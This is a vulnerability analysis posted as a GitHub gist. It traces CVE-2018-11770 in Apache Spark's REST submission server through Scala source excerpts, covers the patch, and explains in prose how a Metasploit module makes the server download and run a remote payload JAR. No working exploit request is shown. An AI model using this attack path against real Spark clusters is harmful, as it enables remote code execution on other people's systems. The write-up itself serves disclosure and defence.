Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save atxsinn3r/fce494721297e53fb289e9e09b6b5452 to your computer and use it in GitHub Desktop.
Save atxsinn3r/fce494721297e53fb289e9e09b6b5452 to your computer and use it in GitHub Desktop.

Apache Spark CreateSubmissionRequest Vulnerability

Originally created by UC Berkeley's AMPLab, Apache Spark is an open-source cluster-computing framework that has been maintained by the Apache Software Foundation. Mostly written in Scala, it is designed to be a fast unified analytics engine for large data, and is used and invested by many high profile or large-scale companies.

Discovered by Chinese researcher Fengwei Zhang (of Alibaba Cloud Security Team), the REST API CreateSubmissionRequest can be abused while in standalone mode to allow users to submit a malicious code and result in remote code execution. A Metasploit module was submitted on November 12, 2018, and this is how our analysis began.

Accroding to Apache Spark's security issue list, this vulnerability is referred as CVE-2018-11770.

Vulnerable Application

According to the vendor, versions from 1.3.0 running standalone master with REST API enabled, or running Mesos master which cluster mode enabled.

For testing purposes, the vulnerable version of Apache Spark can be installed as a Docker container by performing the following:

$ git clone https://github.com/vulhub/vulhub/tree/master/spark/unacc
$ docker-compose up -d

For manual installation, a walkthrough for the Windows version can be found here

Vendor Patching

The release notes of Apache Spark indicate that the vulnerabiliyt was patched in version 2.4.0, with the Jira ticket as [SPARK-25088]. The pull request can be found as #22071, with the following specifics:

  • REST submission server is disabled by default in standalone mode.
  • Fails the standalone master if REST server enabled and authentication secret set.
  • Fails the mesos cluster dispatcher if authentication secret set.
  • When submitting a standalone application, only try the REST submission first if spark.master.rest.enabled=true (in the config file).

Review Details

Given the fact Apache Spark is quite well documented, including release notes, Jira tickets, pull requests, etc, it doesn't take very long to identify the code responsible for the inscure submission based on the patch, which is the StandaloneRestServer class.

The Starting Point: Abstract RestSubmissionServer

The StandaloneRestServer class actually extends from the abstract RestSubmissionServer class, so we need to take a look at that first. In the beginning of this class, it tells us how the URLs are mapped:

protected val baseContext = s"/${RestSubmissionServer.PROTOCOL_VERSION}/submissions"
protected lazy val contextToServlet = Map[String, RestServlet](
    s"$baseContext/create/*" -> submitRequestServlet,
    s"$baseContext/kill/*" -> killRequestServlet,
    s"$baseContext/status/*" -> statusRequestServlet,
    "/*" -> new ErrorServlet // default handler
)

The above tells us that if the server sees a request in this format, go to the submitRequestServlet class:

/v1/submissions/create

Inside the submitRequestServlet class, there is a doPost function:

protected override def doPost(
    requestServlet: HttpServletRequest,
    responseServlet: HttpServletResponse): Unit = {
    val responseMessage =
    try {
        val requestMessageJson = Source.fromInputStream(requestServlet.getInputStream).mkString
        val requestMessage = SubmitRestProtocolMessage.fromJson(requestMessageJson)
        // The response should have already been validated on the client.
        // In case this is not true, validate it ourselves to avoid potential NPEs.
        requestMessage.validate()
        handleSubmit(requestMessageJson, requestMessage, responseServlet)
    } catch {
        // The client failed to provide a valid JSON, so this is not our fault
        case e @ (_: JsonProcessingException | _: SubmitRestProtocolException) =>
        responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST)
        handleError("Malformed request: " + formatException(e))
    }
    sendResponse(responseMessage, responseServlet)
}

Basically what this does is getting data from the stream, normalize, and then pass that to a handleSubmit function. Whoever is using RestSubmissionServer would have to implment handleSubmit.

StandaloneRestServer

Now that we have a basic understanding of the abstract class, we can look at the sub classes, and StandaloneRestServer is one of those that extends RestSubmissionServer and seems to fit the description of the problem.

private[deploy] class StandaloneRestServer(
    host: String,
    requestedPort: Int,
    masterConf: SparkConf,
    masterEndpoint: RpcEndpointRef,
    masterUrl: String)
  extends RestSubmissionServer(host, requestedPort, masterConf) 

It's also very easy to identify what we should be looking at because of this line in the code:

protected override val submitRequestServlet =
new StandaloneSubmitRequestServlet(masterEndpoint, masterUrl, masterConf)

In StandaloneSubmitRequestSevelet, we find the handleSubmit code we need:

protected override def handleSubmit(
    requestMessageJson: String,
    requestMessage: SubmitRestProtocolMessage,
    responseServlet: HttpServletResponse): SubmitRestProtocolResponse = {
    requestMessage match {
        case submitRequest: CreateSubmissionRequest =>
        val driverDescription = buildDriverDescription(submitRequest)
        val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](
            DeployMessages.RequestSubmitDriver(driverDescription))
        val submitResponse = new CreateSubmissionResponse
        submitResponse.serverSparkVersion = sparkVersion
        submitResponse.message = response.message
        submitResponse.success = response.success
        submitResponse.submissionId = response.driverId.orNull
        val unknownFields = findUnknownFields(requestMessageJson, requestMessage)
        if (unknownFields.nonEmpty) {
            // If there are fields that the server does not know about, warn the client
            submitResponse.unknownFields = unknownFields
        }
        submitResponse
        case unexpected =>
        responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST)
        handleError(s"Received message of unexpected type ${unexpected.messageType}.")
    }
}

The BuildDriverDescription Call in handleSubmit

Looking at the code, the buildDriverDescription function seems a little interesting. First off, it reveals what the appResource parameter means. The function is bit large to post bit, basically it starts off this way:

val appResource = Option(request.appResource).getOrElse {
    throw new SubmitRestMissingFieldException("Application jar is missing.")
}

And then it is passed in DriverDescription toward the end of the code:

new DriverDescription(appResource, actualDriverMemory, actualDriverCores, actualSuperviseDriver, command)

When we look at the DriverDescription class, we understand appResource's purpose, which is a URL to a jar file:

private[deploy] case class DriverDescription(
    jarUrl: String,
    mem: Int,
    cores: Int,
    supervise: Boolean,
    command: Command)

At this point, it basically means that when we create a submission request, we can pass a JAR from remote, which pretty much dictates the attack vector.

Back to the buildDriverDescription function, it also gives us clues about how the JAR is launched:

val command = new Command(
      "org.apache.spark.deploy.worker.DriverWrapper",
      Seq("{{WORKER_URL}}", "{{USER_JAR}}", mainClass) ++ appArgs,
      environmentVariables, extraClassPath, extraLibraryPath, javaOpts)

The Command class is defined as follows:

private[spark] case class Command(
    mainClass: String,
    arguments: Seq[String],
    environment: Map[String, String],
    classPathEntries: Seq[String],
    libraryPathEntries: Seq[String],
    javaOpts: Seq[String]) {
}

We see that the first argument is the main class, which in this case is org.apache.spark.deploy.worker.DriverWrapper, and it's basically meant to invoke our main method:

val clazz = Utils.classForName(mainClass)
val mainMethod = clazz.getMethod("main", classOf[Array[String]])
mainMethod.invoke(null, extraArgs.toArray[String])

After the driver description is crafted, it is sent to another component called RequestSubmitDriver:

val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](DeployMessages.RequestSubmitDriver(driverDescription))

RequestSubmitDriver

RequestSubmitDriver can be found in the receiveAndReply function in Master.scala:

... code ...

case RequestSubmitDriver(description) =>
if (state != RecoveryState.ALIVE) {
    val msg = s"${Utils.BACKUP_STANDALONE_MASTER_PREFIX}: $state. " +
    "Can only accept driver submissions in ALIVE state."
    context.reply(SubmitDriverResponse(self, false, None, msg))
} else {
    logInfo("Driver submitted " + description.command.mainClass)
    val driver = createDriver(description)
    persistenceEngine.addDriver(driver)
    waitingDrivers += driver
    drivers.add(driver)
    schedule()
    
... code ...

In the else block, we can see that our driver based on the description is added to some collection of drivers and then it calls for schedule(). Let's take a look at what that does:

private def schedule(): Unit = {
    if (state != RecoveryState.ALIVE) {
        return
    }
    val shuffledAliveWorkers = Random.shuffle(workers.toSeq.filter(_.state == WorkerState.ALIVE))
    val numWorkersAlive = shuffledAliveWorkers.size
    var curPos = 0
    for (driver <- waitingDrivers.toList) {
        var launched = false
        var numWorkersVisited = 0
        while (numWorkersVisited < numWorkersAlive && !launched) {
            val worker = shuffledAliveWorkers(curPos)
            numWorkersVisited += 1
            if (worker.memoryFree >= driver.desc.mem && worker.coresFree >= driver.desc.cores) {
                launchDriver(worker, driver)
                waitingDrivers -= driver
                launched = true
            }
            curPos = (curPos + 1) % numWorkersAlive
        }
    }
    startExecutorsOnWorkers()
}

Notice this function calls something called launchDriver, which sounds interesting, let's keep looking:

private def launchDriver(worker: WorkerInfo, driver: DriverInfo) {
    logInfo("Launching driver " + driver.id + " on worker " + worker.id)
    worker.addDriver(driver)
    driver.worker = Some(worker)
    worker.endpoint.send(LaunchDriver(driver.id, driver.desc))
    driver.state = DriverState.RUNNING
}

So the code basically relies on the Worker class to launch the driver, and we can find this in Worker.scala:

    case LaunchDriver(driverId, driverDesc) =>
      logInfo(s"Asked to launch driver $driverId")
      val driver = new DriverRunner(
        conf,
        driverId,
        workDir,
        sparkHome,
        driverDesc.copy(command = Worker.maybeUpdateSSLSettings(driverDesc.command, conf)),
        self,
        workerUri,
        securityMgr)
      drivers(driverId) = driver
      driver.start()

Oh, I wonder what driver.start() does. Since this is from a DriverRunner instance, that's where we find the code.

DriverRunner

The purpose of the DriverRunner is pretty self-explanatory, no need for introduction.

The Worker class tells us we should be looking at the start() function, but there is just a lot of code for process setup and handling, so let's go straight to the point. Tracing from start(), it leads you to this path:

start() -> prepareAndRunDriver() -> runDriver() -> runCommandWithRetry()

The runCommandWithRetry fucntion finally executes our code using ProcessBuilder:

private[worker] def runCommandWithRetry(
    command: ProcessBuilderLike, initialize: Process => Unit, supervise: Boolean): Int = {
      
.... code ...

synchronized {
        if (killed) { return exitCode }
        process = Some(command.start())
        initialize(process.get)
      }
    
... code ...

Now that we have found the code that executes our payload, we should have a basic understanding of what the execution flow looks like, which is the end of the analysis.

Metasploit Module

In order to exploit this, the Metasploit module relies on two mixins: the HttpClient and HttpServer. These two mixins can be tricky with each other, but luckily there is write-up explaining how to use them together, which can be found here.

The HttpServer mixin would be used to host the payload. And the HttpClient sends a submission request to Apache Spark's REST API server, which instructs it to download the payload. Although quite reliable, because this is more about abusing a feature and not some kind of memory corruption, the module can leave quite a few artifacts on the target system. The most obvious one is the malicious driver that can be seen in the master GUI.

Metasploit has a soft policy that prefers modules to use randomness whenever they could. For example: randomzing the payload name, path, padding, etc. However, the randomness actually makes the payload stand out a lot on the master GUI list, which makes this soft policy somewhat debatable.

Summary

Although we're here to audit for a vulnerability in Apache Spark, it doesn't really make us think less of the product. In fact, it's quite the opposite. Apache Spark displays a lot of good software development habits that other people should follow. For example, throughout the reviewing process, we noticed that:

  • Apache Spark's release notes are well written, and link to references.
  • They use Jira for tracking tickets, and they seem to make sure if there's a pull request, the PR # is attached to it.
  • Developers take the time to write good descriptions for pull requests, and they try to make sure the reviewers understand them. This is really amazing, because too many developers are too lazy to do this. PR titles are also properly labeled with the Jira ticket #.
  • Someone is always reviewing before code is merged.
  • Comments can be seen throughout the codebase.
  • Tons of documentations.

As for the CreateSubmissionRequest REST API, technically this is a feature, not exactly a bug. But since it was the default configuration and not carefully documented, it became a potentially over-powered feature that would be reliably abused as a vulnerability by attackers. In the real world, Apache Spark tends to be used with a lot of data behind it, so companies definitely could not afford to have this problem hanging around the network anyway.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment